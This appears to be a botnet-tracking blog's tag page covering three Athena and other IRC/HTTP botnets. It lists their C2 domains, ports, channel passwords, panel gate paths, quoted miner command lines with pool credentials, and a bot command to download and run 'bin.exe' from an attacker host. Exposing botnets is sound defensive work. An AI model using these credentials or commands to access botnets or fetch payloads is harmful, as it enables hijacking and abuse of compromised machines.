Tag: Athena

betabros.in (Several http botnets hosted by hostkey.ru)


Resolved betabros.in to Server:  betabros.in Gate file:  /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/ EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...

xjnhtraj.com (Athena irc botnet hosted by tatacommunications.com)


Server:  xjnhtraj.com Port:  6667 Channel:  #xjnhtraj Channel password:  xjnhtraj Opers: [dwa] (dada@chidaica123): đuawa[dwa] #xjnhtraj [dwa] irc.server.net :IRC server[dwa] is a Bot on IRC server[dwa] idle 00:01:17, signon: Mon Mar 11 15:15:07[dwa] End of WHOIS list. [Troc] (trocdsds@chidaica123): Troc[Troc] #xjnhtraj [Troc] irc.server.net :IRC server[Troc] is a Bot on IRC server[Troc] idle 00:02:11, signon: Mon Mar 11Read more...

filehelp.us (Various irc bots hosted by securedservers.com)


Resolved filehelp.us to Athena Server:  filehelp.us Port:  7200 Channel:  #Athena Insomnia Server:  filehelp.us Port:  4242 Channel:  #insomnia Channel password:  k6geyzs Dixie bot Server:  filehelp.us Port:  4242 Channel:  #DDoS# hxxp://filehelp.us/Panel/gate.php aryan bot Server Password: Username: 5644413 Nickname: New{DE-XP-x86}5644413 Channel: #aryan (Password: k6geyzs) Channeltopic: :.dl hxxp://filehelp.us/upload/files/bin.exe 1 Other samples here hxxp://filehelp.us/upload/ Opers are Vapor andRead more...